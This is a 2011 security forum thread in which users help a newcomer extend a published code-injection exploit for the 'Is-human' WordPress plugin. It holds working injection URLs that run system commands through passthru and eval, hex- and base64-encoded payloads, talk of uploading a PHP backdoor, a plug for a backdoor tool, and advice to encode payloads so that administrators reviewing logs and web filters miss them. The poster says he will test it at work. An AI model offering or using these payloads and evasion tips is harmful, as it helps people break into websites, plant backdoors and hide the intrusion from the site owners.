.

Wordpress plugin exploit

<<

jonas

Newbie
Newbie

Posts: 46

Joined: Mon Jun 08, 2009 9:04 pm

Post Fri Jul 22, 2011 5:38 am

Wordpress plugin exploit

Hi,
I'm playing around with my wordpress installation trying out various exploits found on exploit-db.  However, I'm pretty new to pentesting web applications.

I'm trying out this:  http://www.exploit-db.com/exploits/17299/

Running "http://localhost/wp-content/plugins/is-human/engine.php?action=log-reset&type=ih_options();passthru(ipconfig);error" gives me the ipconfig of the local machine no problems.

However, i would like to get spacing in there. I tried URL encoding (likeipconfig%20/all) but that didn't seem to work. I'd like to do "dir C:\" for example. Also, could i run other types of code in there to upload php backdoor or connect and download it from ftp to webroot or similar?

Any help please?

Error message using URL encoding:

eprecated: Function set_magic_quotes_runtime() is deprecated in C:\xampp\htdocs\wp-settings.php on line 32
Array
Warning: Division by zero in C:\xampp\htdocs\wp-content\plugins\is-human\engine.php(29) : eval()'d code on line 1

Warning: passthru() [function.passthru]: Cannot execute a blank command in C:\xampp\htdocs\wp-content\plugins\is-human\engine.php(29) : eval()'d code on line 1

Warning: error_log() expects at least 1 parameter, 0 given in C:\xampp\htdocs\wp-content\plugins\is-human\engine.php(29) : eval()'d code on line 1
<<

Data_Raid

User avatar

Full Member
Full Member

Posts: 165

Joined: Fri Nov 09, 2007 5:55 am

Post Fri Jul 22, 2011 6:40 am

Re: Wordpress plugin exploit

I'm no expert but ..... would $nbsp; work?

  Code:
(ipconfig$nbsp;/all)
All men by nature desire knowledge.

Aristotle
<<

hayabusa

User avatar

Hero Member
Hero Member

Posts: 1662

Joined: Mon Jan 29, 2007 2:59 pm

Post Fri Jul 22, 2011 11:59 am

Re: Wordpress plugin exploit

I'm also guessing (not sitting by a machine to try it, right the moment) that it doesn't like the / character, and you might need to encode that, as well, if simply using the %20 for the space doesn't work.

Part of your error info lends to my thinking, too:

"Warning: Division by zero in C:\xampp\htdocs\wp-content\plugins\is-human\engine.php(29) : eval()'d code on line 1"

It's misinterpreting the / as a division, and turning your whole command into gibberish:

"Warning: passthru() [function.passthru]: Cannot execute a blank command in C:\xampp\htdocs\wp-content\plugins\is-human\engine.php(29) : eval()'d code on line 1"
Last edited by hayabusa on Fri Jul 22, 2011 12:12 pm, edited 1 time in total.
~ hayabusa ~ 

"All men can see these tactics whereby I conquer, but what none can see is the strategy out of which victory is evolved." - Sun Tzu, 'The Art of War'


OSCE, OSCP , GPEN, C|EH
<<

MaXe

User avatar

Hero Member
Hero Member

Posts: 671

Joined: Tue Aug 17, 2010 9:49 am

Post Fri Jul 22, 2011 12:23 pm

Re: Wordpress plugin exploit

If you can execute PHP successfully like this:
http://localhost/wp-content/plugins/is- ... h_options();passthru(ipconfig);error

Just use input like this:
http://localhost/wp-content/plugins/is- ... h_options();eval("\x41\x41\x41");error

(Those hexadecimal A's being PHP CODE that should be executed. So within eval, write passthru("IP Config") and then ENCODE it. It's very important you encode it.)

An alternative way, is:
http://localhost/wp-content/plugins/is- ... h_options();eval(base64_decode("t00wt00w"));error

Where "t00wt00w" is a base64 encoded backdoor.

Need help? Try HaXxd00r (you may encounter encoding errors fyi!)

Reference: www.intern0t.net/haxxd00r
(Yes, it's free to use and it's only for educationable purposes etc.)


Edit:
IF you're already within an eval() statement, you should avoid using eval() again. It may not work as intended. But feel free to try.

You could try something like this:
http://localhost/wp-content/plugins/is- ... h_options();base64_decode("t00wt00w");error

Where "t00wt00w" is a base64 encoded backdoor or whatever you want. Have fun!  ;D
Last edited by MaXe on Fri Jul 22, 2011 12:25 pm, edited 1 time in total.
I'm an InterN0T'er
<<

hayabusa

User avatar

Hero Member
Hero Member

Posts: 1662

Joined: Mon Jan 29, 2007 2:59 pm

Post Fri Jul 22, 2011 12:29 pm

Re: Wordpress plugin exploit

MaXe has a good point, and beat me to it.  Was about to reply again, and simply suggest that best practice would be to encode the whole string, anyway. 

Multiple reasons:

1.) gets you past errors like you hit

2.) less chance that an admin reviewing a log would have a clue what it was you actually did

3.) gets you past other web filtering solutions they might have in place.

4.) it's way cooler anyway  :P
~ hayabusa ~ 

"All men can see these tactics whereby I conquer, but what none can see is the strategy out of which victory is evolved." - Sun Tzu, 'The Art of War'


OSCE, OSCP , GPEN, C|EH
<<

MaXe

User avatar

Hero Member
Hero Member

Posts: 671

Joined: Tue Aug 17, 2010 9:49 am

Post Sat Jul 23, 2011 1:07 pm

Re: Wordpress plugin exploit

hayabusa wrote:Multiple reasons: (for encoding a payload - MaXe)

1.) gets you past errors like you hit

2.) less chance that an admin reviewing a log would have a clue what it was you actually did

3.) gets you past other web filtering solutions they might have in place.

4.) it's way cooler anyway  :P


Quoted for Truth!  ;D
I'm an InterN0T'er
<<

jonas

Newbie
Newbie

Posts: 46

Joined: Mon Jun 08, 2009 9:04 pm

Post Sun Jul 24, 2011 3:19 pm

Re: Wordpress plugin exploit

Hehe. Absolutely way cooler in hex!! ;)  I really appreciate the feedback!
I will be testing this at work tomorrow and tell you how it went!
Much obliged!
<<

jonas

Newbie
Newbie

Posts: 46

Joined: Mon Jun 08, 2009 9:04 pm

Post Mon Jul 25, 2011 3:54 am

Re: Wordpress plugin exploit

Hi again guys,
I tried the stuff you said and I'm somewhat convinced this should work!  However it doesn't!  I'ts most likely me doing something wrong...

I tried alot of stuff like (ipconfig):

http://localhost/wp-content/plugins/is- ... h_options();passthru("\x65\x72\x72\x6f\x72\x5f\x72\x65\x70\x6f\x72\x74\x69\x6e\x67\x28\x30\x29\x3b\x65\x63\x68\x6f\x20\x40\x69\x6e\x63\x6c\x75\x64\x65\x28\x24\x5f\x50\x4f\x53\x54\x5b\x22\x69\x70\x63\x6f\x6e\x66\x69\x67\x22\x5d\x29\x3b");error

Tried both POST/GET just to check it out.
I also tried various variants of the base64 with different function calls.
Errors are turned off.

Most of the time im getting this error message:

Parse error: syntax error, unexpected '"', expecting T_STRING in C:\xampp\htdocs\wp-content\plugins\is-human\engine.php(29) : eval()'d code on line 1

Removing apostrophes gives me:
Parse error: syntax error, unexpected T_NS_SEPARATOR, expecting T_STRING in C:\xampp\htdocs\wp-content\plugins\is-human\engine.php(29) : eval()'d code on line 1

Any clues? 
Btw, that "HaXxd00r" was pure awesomeness =)
<<

MaXe

User avatar

Hero Member
Hero Member

Posts: 671

Joined: Tue Aug 17, 2010 9:49 am

Post Mon Jul 25, 2011 12:58 pm

Re: Wordpress plugin exploit

I'm not sure if passthru() Accepts that kind of input, even though it should, but then again.. It takes arguments and executes them as commands on the target Operating System, so if it doesn't convert the input, then an error would be returned.

Try: passthru(base64_decode("bHMgLWFs"))
Or: passthru(base64_decode('bHMgLWFs'))
(This should execute an "ls -al" command, note there's a space included.)

For that kind hexadecimal input, you will _always_ need to encapsulate the input in quotes " in most cases, using apostrophes ' may not work, even though it should!  ;D (I think I encountered a problem like this once, a long time ago, not 100% sure since it should be the same, in most cases where variables and other special characters are not used.)

Note:
Hmm, but after thinking about the first error for a while, the error could be caused due to you use ", and you should try to use ' then. I know it sounds strange, but all I can do is guess when I don't have the source code of that engine.php script  :)
I'm an InterN0T'er

Return to Web Applications

Who is online

Users browsing this forum: No registered users and 1 guest

.
Powered by phpBB® Forum Software © phpBB Group.
Designed by ST Software